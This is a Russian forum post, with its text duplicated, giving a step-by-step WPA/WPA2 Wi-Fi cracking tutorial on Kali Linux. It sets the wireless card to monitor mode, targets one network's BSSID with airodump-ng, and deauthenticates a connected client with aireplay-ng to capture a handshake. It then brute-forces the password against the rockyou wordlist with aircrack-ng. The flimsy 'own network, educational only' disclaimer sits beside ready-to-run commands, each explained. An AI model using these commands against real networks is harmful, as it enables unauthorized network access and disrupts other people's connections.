Внимание!
Тема создана исключительно в ознакомительных целях и автор не побуждает никого ничего взламывать!
Хочу рассказать как же взломать свою WI-FI сеть. Пользоваться мы будем терминалом. По левой стороне в менюшке(Если вы ее не перенастраивали) будет чёрная иконка. Жмём её. С ним мы будем работать весь урок.
Для начала нам нужна база паролей для брута. В Кали уже есть база из 14 миллионов паролей и она называется "rockyou". Давайте её найдём, перенесём и распакуем на рабочий стол.
Команда locate rockyou.txt.gz ищет файл "rockyou.txt.gz" по всей системе.
Вот, на скриншоте видно, что путь до файла /usr/share/wordlists/rockyou.txt.gz. Теперь давайте перенесём файл на рабочий стол командой cp /usr/share/wordlists/rockyou.txt.gz ./Desktop/. Осталось только распаковать архив командой gunzip -f /Desktop/rockyou.txt.gz.
Теперь нужно отключить лишние процессы, которые будут мешать работе, командой airmon-ng check kill. Теперь нужно переключить wifi-карту в режим мониторинга. Можно это сделать как на скриншоте длинющей командой ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up, но мы сделаем проще. Пишем iwconfig и смотрим как называется интерфейс. В моём случае он называется "wlan0". Пишем airmon-ng start wlan0 (Если пропадет интернет - это нормально. Чтобы вернуть интернет, переводим роутер в wifi-карту в режим контроля командой airmon-ng stop wlan0mon. Если опять не заработает, то пишите service network-manager stop, а потом service network-manager start)
Заранее давайте создадим папочку под наши файлы командой cd ~/Desktop/ && mkdir caps.Теперь нам нужно мониторить сети, которые вообще видит наша WIFI-карта. Для этого используем команду airodump-ng wlan0mon. Теперь мы видим все сети и клиентов, подключенные к ним.
А вот и те самые файлы создались, которые нам пригодятся позже.
Но зачем нам все, если нужна только 1? Давайте отсеим. Чтобы отсеить, нам нужно знать канал сети и BSSID роутера. На скриншоте я покажу то, с чем мы сегодня работать будем.
Вот эта команда нам позволит всё это сделать: airodump-ng -c 2 --bssid XX:E3:XX:4E:XX:50 -w /root/Desktop/caps/ wlan0mon. Разберём команду.
Номер канала сети: -c 2
Сеть, которую мы будем взламывать: --bssid XX:E3:XX:4E:XX:50
Путь, куда будут сохраняться все полученные файлы + хендшейк: -w /root/Desktop/caps/
Значения канала и bssid у всех будут разные! То есть то, что после -c и --bssid будет разное.
Используемый интерфейс: wlan0mon (У всех будет такой же)
Теперь мы мониторим одну сеть. Двигаемся дальше.
Как мы видем на скриншоте выше, к этой сети подключён один пользователь с MAC-адресом XX:46:XXF:XX:9E. Нам нужен хендшейк(Рукопожатие). С технической точки зрения, рукопожатие в беспроводных сетях — это обмен информацией между точкой доступа и клиентом в момент подключения клиента к ней. Эта информация содержит разнообразные ключи, обмен происходит в несколько стадий. И как нам его получить? Правильно, заставить клиента переподключаться к сети, чтобы получить handshake. Мы же не будем ждать, пока клиент сам это сделает? Давайте исправим. Открываем новый терминал и спользуем следующую команду: aireplay-ng -0 10 -a XX:E3:XX:XX:50 -c XX:46:XX:F:XX:9E wlan0mon. Разберём:
Говорим программе "airplay-ng" о том, что отправляем "мёртвые" пакеты: -0
Количество пакетов: 10
К какой сети будем переподключать: -a XX:E3:XX:XX:50
Какого клиента будем переподключать к сети: -c XX:46:XX:F:XX:9E
В правом углу должна появиться строчка "WPA handshake %bssid_сети%":
Всё шикарно! Теперь надо сверить зашифрованный пароль с нашей базой паролей. Используем команду:
aircrack-ng -a2 -b XX:E3:XX:4E:XX:50 -w /root/Desktop/rockyou.txt /root/Desktop/caps/*.cap.
Указываем программе, что тип безопасности у нас WPA/WPA2/WPA2-PSK: -a2
Указываем BSSID сети, к которой будем подбирать пароль: -b XX:E3:XX:4E:XX:50
Откуда берём хендшейк файл: -w /root/Desktop/rockyou.txt /root/Desktop/caps/*.cap
В итоге у нас должен начаться вот такой перебор паролей:
Перебор может занять много времени и даже не найти правильного пароля. Поэтому делайте сами базы или ищите в интернете. У меня же перебор занял 3 минуты и 44 секунды. Я рад, что смог вспомнить пароль от WI-FI.kek
Вот, собственно, и всё.
Тема создана исключительно в ознакомительных целях и автор не побуждает никого ничего взламывать!
Хочу рассказать как же взломать свою WI-FI сеть. Пользоваться мы будем терминалом. По левой стороне в менюшке(Если вы ее не перенастраивали) будет чёрная иконка. Жмём её. С ним мы будем работать весь урок.
Для начала нам нужна база паролей для брута. В Кали уже есть база из 14 миллионов паролей и она называется "rockyou". Давайте её найдём, перенесём и распакуем на рабочий стол.
Команда locate rockyou.txt.gz ищет файл "rockyou.txt.gz" по всей системе.
Вот, на скриншоте видно, что путь до файла /usr/share/wordlists/rockyou.txt.gz. Теперь давайте перенесём файл на рабочий стол командой cp /usr/share/wordlists/rockyou.txt.gz ./Desktop/. Осталось только распаковать архив командой gunzip -f /Desktop/rockyou.txt.gz.
Теперь нужно отключить лишние процессы, которые будут мешать работе, командой airmon-ng check kill. Теперь нужно переключить wifi-карту в режим мониторинга. Можно это сделать как на скриншоте длинющей командой ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up, но мы сделаем проще. Пишем iwconfig и смотрим как называется интерфейс. В моём случае он называется "wlan0". Пишем airmon-ng start wlan0 (Если пропадет интернет - это нормально. Чтобы вернуть интернет, переводим роутер в wifi-карту в режим контроля командой airmon-ng stop wlan0mon. Если опять не заработает, то пишите service network-manager stop, а потом service network-manager start)
Заранее давайте создадим папочку под наши файлы командой cd ~/Desktop/ && mkdir caps.Теперь нам нужно мониторить сети, которые вообще видит наша WIFI-карта. Для этого используем команду airodump-ng wlan0mon. Теперь мы видим все сети и клиентов, подключенные к ним.
А вот и те самые файлы создались, которые нам пригодятся позже.
Но зачем нам все, если нужна только 1? Давайте отсеим. Чтобы отсеить, нам нужно знать канал сети и BSSID роутера. На скриншоте я покажу то, с чем мы сегодня работать будем.
Вот эта команда нам позволит всё это сделать: airodump-ng -c 2 --bssid XX:E3:XX:4E:XX:50 -w /root/Desktop/caps/ wlan0mon. Разберём команду.
Номер канала сети: -c 2
Сеть, которую мы будем взламывать: --bssid XX:E3:XX:4E:XX:50
Путь, куда будут сохраняться все полученные файлы + хендшейк: -w /root/Desktop/caps/
Значения канала и bssid у всех будут разные! То есть то, что после -c и --bssid будет разное.
Используемый интерфейс: wlan0mon (У всех будет такой же)
Теперь мы мониторим одну сеть. Двигаемся дальше.
Как мы видем на скриншоте выше, к этой сети подключён один пользователь с MAC-адресом XX:46:XXF:XX:9E. Нам нужен хендшейк(Рукопожатие). С технической точки зрения, рукопожатие в беспроводных сетях — это обмен информацией между точкой доступа и клиентом в момент подключения клиента к ней. Эта информация содержит разнообразные ключи, обмен происходит в несколько стадий. И как нам его получить? Правильно, заставить клиента переподключаться к сети, чтобы получить handshake. Мы же не будем ждать, пока клиент сам это сделает? Давайте исправим. Открываем новый терминал и спользуем следующую команду: aireplay-ng -0 10 -a XX:E3:XX:XX:50 -c XX:46:XX:F:XX:9E wlan0mon. Разберём:
Говорим программе "airplay-ng" о том, что отправляем "мёртвые" пакеты: -0
Количество пакетов: 10
К какой сети будем переподключать: -a XX:E3:XX:XX:50
Какого клиента будем переподключать к сети: -c XX:46:XX:F:XX:9E
В правом углу должна появиться строчка "WPA handshake %bssid_сети%":
Всё шикарно! Теперь надо сверить зашифрованный пароль с нашей базой паролей. Используем команду:
aircrack-ng -a2 -b XX:E3:XX:4E:XX:50 -w /root/Desktop/rockyou.txt /root/Desktop/caps/*.cap.
Указываем программе, что тип безопасности у нас WPA/WPA2/WPA2-PSK: -a2
Указываем BSSID сети, к которой будем подбирать пароль: -b XX:E3:XX:4E:XX:50
Откуда берём хендшейк файл: -w /root/Desktop/rockyou.txt /root/Desktop/caps/*.cap
В итоге у нас должен начаться вот такой перебор паролей:
Перебор может занять много времени и даже не найти правильного пароля. Поэтому делайте сами базы или ищите в интернете. У меня же перебор занял 3 минуты и 44 секунды. Я рад, что смог вспомнить пароль от WI-FI.kek
Вот, собственно, и всё.
Последнее редактирование: